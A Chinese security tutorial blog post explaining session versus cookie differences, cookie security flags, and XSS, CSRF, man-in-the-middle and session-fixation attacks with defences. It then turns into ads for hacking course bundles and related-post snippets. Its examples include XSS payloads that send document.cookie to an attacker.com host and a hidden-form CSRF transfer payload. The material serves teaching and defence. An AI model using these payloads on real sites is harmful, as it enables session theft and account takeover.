Session与Cookie安全全解析:区别、漏洞与防护策略,网络安全零基础入门到精通实战教程!

原创 于 2025-07-07 17:10:53 发布 · 649 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #黑客技术 #干货分享 #漏洞挖掘 #渗透测试 #编程

文章目录

1. Session 与 Cookie 的区别
定义

  • Cookie:一种客户端存储机制,由服务器通过 HTTP 响应头的 Set-Cookie 字段发送到客户端,浏览器在后续请求中自动携带这些数据。Cookie 通常用于存储少量信息,如用户偏好或会话标识。

  • Session:一种服务器端存储机制,用于在服务器上维护用户的会话状态。Session 通常通过 Cookie 传递一个唯一的 Session ID,服务器根据此 ID 查找对应的会话数据。

存储位置

  • Cookie:数据存储在客户端浏览器中。

  • Session:数据存储在服务器端,客户端仅持有 Session ID。

生命周期

  • Cookie:可设置过期时间,过期后自动失效;若未设置,则浏览器关闭后失效。

  • Session:通常在用户一段时间不活动后由服务器销毁,具体时间由服务器配置。

数据量

  • Cookie:受浏览器限制,通常不超过 4KB。

  • Session:存储在服务器端,数据量理论上无限制,但受服务器资源约束。

安全性

  • Cookie:存储在客户端,易被窃取或篡改。

  • Session:数据在服务器端,相对安全,但 Session ID 泄露可能导致风险。

2. Session 与 Cookie 在安全方面的区别

  • 数据存储位置

    • Cookie:数据存储在客户端,可能包含敏感信息,易被攻击者获取。

    • Session:敏感数据存储在服务器,客户端仅持有 Session ID,安全性更高。

  • 篡改风险

    • Cookie:攻击者可通过浏览器工具或脚本直接修改 Cookie 值。

    • Session:Session 数据在服务器端,客户端无法直接篡改。

  • 泄露风险

    • Cookie:易受 XSS(跨站脚本攻击)窃取,若未加密传输还可能被截获。

    • Session:Session ID 若泄露,可能导致会话劫持,但数据本身较安全。

  • 持久性

    • Cookie:可设置长时间有效,增加被利用的风险。

    • Session:通常短期有效,过期后失效,风险较低。

总结:Session 因数据存储在服务器端,比 Cookie 更安全,但需保护好 Session ID。

3. Cookie 中与安全相关的字段及漏洞利用
与安全相关的字段

  • HttpOnly:禁止 JavaScript 访问 Cookie,防止 XSS 攻击窃取。

  • Secure:限制 Cookie 仅通过 HTTPS 传输,防止中间人攻击。

  • SameSite:控制 Cookie 在跨站请求中的发送行为,防止 CSRF(跨站请求伪造)攻击:

    • SameSite=Strict:仅同站请求携带 Cookie。

    • SameSite=Lax:允许部分跨站请求(如 GET)携带。

    • SameSite=None:允许所有跨站请求(需配合 Secure)。

漏洞利用

  • XSS 攻击

    • 方式:攻击者注入恶意脚本,窃取未设置 HttpOnly 的 Cookie。

    • 示例<script>document.write('<img src="http://attacker.com/steal?cookie=' + document.cookie + '">')</script>

  • CSRF 攻击

    • 方式:攻击者诱导用户在登录状态下访问恶意网站,触发带 Cookie 的请求。

    • 示例:用户访问恶意网站,自动提交表单到 http://bank.com/transfer

  • 中间人攻击

    • 方式:在 HTTP 连接中截获未设置 Secure 的 Cookie。

    • 示例:攻击者重放 Cookie 冒充用户。

4. Cookie 安全和 Session 安全需要注意的方面及安全利用方法
Cookie 安全注意事项

  • 设置 HttpOnly,防止 XSS 窃取。

  • 设置 Secure,确保仅在 HTTPS 中传输。

  • 设置 SameSite,根据需求选择策略,防止 CSRF。

  • 设置短过期时间,减少被利用的时间窗口。

  • 避免存储明文敏感信息,必要时加密。

Session 安全注意事项

  • Session ID 安全

    • 使用长随机 ID,防止猜测。

    • 定期更换 ID,防止会话固定攻击。

  • 过期策略

    • 设置合理过期时间,避免长期有效。

  • 服务器保护

    • 使用安全的存储方式(如加密数据库)。

    • 防止未授权访问 Session 数据。

安全利用方法

  • Cookie

    • 仅存储 Session ID,敏感数据放入 Session。

    • 启用 HttpOnly、Secure 和 SameSite。

  • Session

    • 确保 Session ID 通过安全通道传输。

    • 用户登出时销毁 Session。

5. 实际工作案例
案例 1:XSS 窃取 Cookie

  • 场景:某网站未设置 HttpOnly,用户评论区存在 XSS 漏洞。

  • 过程

    1. 攻击者在评论中注入:<script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>

    2. 用户访问页面,脚本执行,Cookie 被发送到攻击者服务器。

  • 结果:攻击者获取 Cookie,冒充用户。

案例 2:CSRF 转账攻击

  • 场景:某银行网站未设置 SameSite,用户登录后访问恶意网站。

  • 过程

    1. 恶意网站包含表单:<form action="http://bank.com/transfer" method="POST"><input type="hidden" name="amount" value="1000"><input type="hidden" name="to" value="attacker"></form>

    2. 用户访问时,浏览器自动发送请求。

  • 结果:用户资金被转走。

案例 3:Session 固定攻击

  • 场景:某网站在登录前分配 Session ID。

  • 过程

    1. 攻击者获取 Session ID 并诱导受害者使用。

    2. 受害者登录后,攻击者使用同一 ID 访问。

  • 结果:攻击者冒充受害者。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

[网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
杨秀璋的专栏
09-22 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来博友共勉,希望您们喜欢,一起进步。前文分享了Wireshark安装入门和一个抓取网站用户名和密码的案例,本篇文章将继续深入学习Wireshark的抓包原理知识,并分享数据流追踪、专家信息操作,最后结合NetworkMiner工具抓取了图像资源和用户名密码。本文参考了PingingLab陈鑫杰老师的部分内容,非常推荐大家观看他的教程。同时,Bilibili是学习网络安全编程的好地方喔,大家可以去试试。
剖析Cookie的工作原理及其安全风险
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-06 2915
Cookie,也称为HTTP cookieweb cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备网页的小型数据片段。它允许Web服务器跟踪用户的浏览历史并响应之前披露的偏好。可以增强用户体验,并基于过去的行为启用个性化内容。Cookie通常以键值对的形式存储在用户的硬盘上,是一个二进制的Sqlite文件,Windows系统中Chrome浏览器的Cookie默认位置一般为。Cookie有多种类型,包括会话cookie和持久cookie
如何安全的处理cookie,不让cookie被利用
10-12
史上最如何安全的处理cookie,不让cookie被利用最如何安全的处理cookie
cookie安全
----------------
12-13 620
跨站点脚本XSS使用跨站点脚本技术可以窃取cookie。当网站允许使用javascript操作cookie的时候,就会发生攻击者发布恶意代码攻击用户的会话,同时可以拿到用户的cookie信息。例子: <a href="#" onclick=`window.location=http://abc.com?cookie=${docuemnt.cookie}`>领取红包</a>当用户点击这个链接的时候,
浅谈cookie安全
课嗨教育的专栏
04-03 2573
0x01 简介 1. cookie简述 由于HTTP协议是无状态的,而服务器端的业务必须是要有状态的。Cookie诞生的最初目的是为了存储web中的状态信息,以方便服务器端使用。比如判断用户是否是第一次访问网站。目前最新的规范是RFC 6265,它是一个由浏览器服务器共同协作实现的规范。服务端可以通过http的响应对cookie进行增加、修改和删除。而在客户端中也可以通过脚本语言如:JavaScript对其进行同样的操作。 2. cookie的组成结构 Cookie的字段一般分为: [name]
总结Cookie安全安全风险和防范建议
Neonline254的博客
05-23 5855
本文从安全工程师的视角总结了Cookie技术和其安全问题,包括Cookie技术的介绍、所带来的安全问题及对应的防范手段和建议,希望能给想了解Cookie安全的你带来一些帮助。
Web安全Cookie管理
brizer的博客
09-09 2201
前面我们讲到过XSS攻击,其原理就是利用脚本读取用户的Cookie从而造成用户信息泄露。这里我们要介绍Cookie的几个关键属性值HttpOnly、Secure及其用法。HttpOnly该属性值的作用就是防止Cookie值被页面脚本读取。一个没有设置HttpOnly的Cookie:setcookie('name','lf');效果如下: 这段代码就可能被攻击者用脚本来获取,所以我们应该为Cooki
Cookie有哪些安全隐患,如何防范?
长风破浪会有时的博客
05-16 1065
首先,我们要明白Cookie就像是我们放在网上的一个小标记,它可以帮助网站记住我们的一些信息,比如我们的用户名、喜欢的设置等。:在公共网络上,比如咖啡馆、图书馆的WiFi,我们的信息更容易被黑客窃取。:首先,我们要为我们的账户设置一个复杂且独特的密码,这样即使黑客偷走了我们的Cookie,他们也很难猜出我们的密码。:我们要确保我们使用的浏览器和访问的网站是安全的,它们会采取额外的措施来保护我们的Cookie和信息。:黑客可能会通过偷走我们的Cookie来假冒我们的身份,进入我们的账户,窃取我们的个人信息。
如何保障Cookie的信息安全
Reische的博客
12-29 1943
默认情况下,Cookie 的生命周期为临时会话级,而在最新的浏览器中,SameSite 的默认值设为 Lax,已具备较高安全性。根据实际需求或请求协议,可将 Cookie 设置为 HttpOnly 或 Secure,以进一步提升安全级别。除非必要,否则不建议设置过期时间和作用域,以免无意间扩大 Cookie 的生命周期和作用范围。除非必要,否则不建议在 XHR 和 Fetch 请求中扩大 Cookie 的处理策略
Cookies 简介以及存在的安全隐患
Soinice的博客
12-03 3578
Cookies是涉及到计算机使用安全的一个非常重要的文件,本文对其基本情况及使用时需要注意的防范和安全问题进行了阐述。  什么是Cookies Cookie 是一个键值对(客户端) Cookie是由服务器端生成,发送给User-Agent(一般是浏览器),浏览器会将Cookie的key/value保存到某个目录下的文本文件内,下次请求同一网站时就发送该Cookie给服务器(前提是浏览...
一文让你彻底搞懂cookiesession产生漏洞的原理
carrot11223的博客
01-23 1359
这种再次请求的时候,cookie里面就不会再出现敏感值,但是存在sessionid的值,一个sessionid对应一个sessionsession可以理解为打电话,如果一方挂断了电话,就结束了本次通话,当第二次用另一个浏览器进行访问的时候(另外一次电话连接),sessionid就已经变了,不同的电话连接有不同的session,既然cookie可以进行cookie伪造,那session可以嘛?那盗取又是什么意思呢?可以看到无论是cookie还是session都可以进行身份验证,只是储存的位置不一致。
Session Cookie 安全解析区别漏洞防护策略
最新发布
浩策盾悟
04-10 7577
Session 通常通过 Cookie 传递一个唯一的 Session ID,服务器根据此 ID 查找对应的会话数据。:Session 因数据存储在服务器端,比 Cookie安全,但需保护好 Session ID。:数据在服务器端,相对安全,但 Session ID 泄露可能导致风险。:敏感数据存储在服务器,客户端仅持有 Session ID,安全性更高。:攻击者诱导用户在登录状态下访问恶意网站,触发带 Cookie 的请求。:Session ID 若泄露,可能导致会话劫持,但数据本身较安全
cookie
weixin_45307185的博客
09-29 331
1、cookie的作用: 我们在浏览器中,经常涉及到数据的交换,比如你登录邮箱,登录一个页面。我们经常会在此时设置30天内记住我,或者自动登录选项。那么它们是怎么记录信息的呢,答案就是今天的主角cookie了,Cookie是由HTTP服务器设置的,保存在浏览器中,但HTTP协议是一种无状态协议,在数据交换完毕后,服务器端和客户端的链接就会关闭,每次交换数据都需要建立新的链接。就像我们去超市...
Session会话注销漏洞
渗透之路,攻防之间皆学问
07-15 7205
漏洞描述 Session 是应用系统对浏览器客户端身份认证的属性标识,在用户注销或退出应用系统时,系统应将客户端Session认证属性标识清空。危害:如果未能清空Session认证会话,该认证会话将持续有效,此时攻击者获得该Session认证会话会导致用户权限被盗取。 漏洞检测 该项测试主要在用户注销退出系统授权后,判断授权认证SessionID值是否依然有 效。若授权认证SessionID依然有效则存在风险。 如下,账号登陆系统后再退出账号,此时cookie还有效,通过重放该数据包,还能访问到
98.网络安全渗透测试—[常规漏洞挖掘利用篇14]—[SESSION身份验证绕过漏洞测试]
qwsn
02-05 7264
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、session身份验证绕过漏洞测试 1、session机制 2、session的生命周期 3、出现漏洞的情景 4、session身份验证绕过示例: (1)源码:`session.php` (2)绕过:`抓包改包` (3)总结:
Session反序列化漏洞解析
2301_79629995的博客
10-06 1421
当某个用户第一次访问网站时,Session_start()函数会创建一个唯一的SessionID,并通过HTTP响应头,也就是返回包,将SessionID保存在客户端,也就是用户浏览器的Cookie中。以上两PHP文件在session的存储引擎上采用了不同的方式,因此在解析session文件中的数据时就产生了歧义,如对于php_serialize来说 ”|“仅仅只是一个字符,但对于php而言则是分割符,因此对session产生了不同的解析结果,我们通过如下脚本生成payload。s:3:"age";
前端安全—常见的攻击方式及防御方法
dzqxwzoe的博客
12-31 2924
储存型(持久型):会把攻击者的数据储存到服务端,攻击行为将伴随攻击数据一直存在,每当用户访问该页面就会触发代码执行。很容易被盗取,如果被盗取,别人就可以冒充你的身份,打开你的保险柜,获取你的信息,动用你的资金,这是很危险的。顾名思义就是通过伪造连接请求,在用户不知情的情况下,让用户以自己的身份来完成非本意操作的攻击方法。标签,当用户浏览该页面时,恶意代码就会被执行,从而达到攻击的目的。,后端未经过滤直接存储到数据库,当正常用户浏览到他的留言后,这段。是无状态的协议,为了维持和跟踪用户的状态,引入了。
Cookie 安全
allway2的博客
09-05 2041
攻击者将会话标识符强制输入目标用户的浏览器,然后等待用户登录。出于本文的目的,请注意计时攻击是可能的,因为浏览器在跨站点请求中包含会话 cookie。在本文中,您将了解有关 HTTP cookie 安全性、什么是 cookie 相关的攻击以及如何防御它们的所有信息。在 http:// 或 ws:// 请求中包含使用属性设置的 cookie,只有 https:// 和 ws://。请注意会话 cookie 是如何通过未加密的连接传输的,该会话 cookie 仅应在 HTTPS 页面上使用。
cookie安全
天高任鸟飞,海阔凭鱼跃
03-17 2301
什么是cookie 指某些网站为了辨别用户身份、进行session跟踪而存储在用户本地终端上的数据(通常经过加密)。(注:此定义来自百度百科) cookie对于登录的效果 排除用户手动删除浏览器cookie以及cookie未过期的情况下,用户如果在某网站登录过一次,下次访问这个网站,用户不需要输入用户名和密码就可以进入网站。 cookie的生命周期 创建cookie的时候,会给cookie指定一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值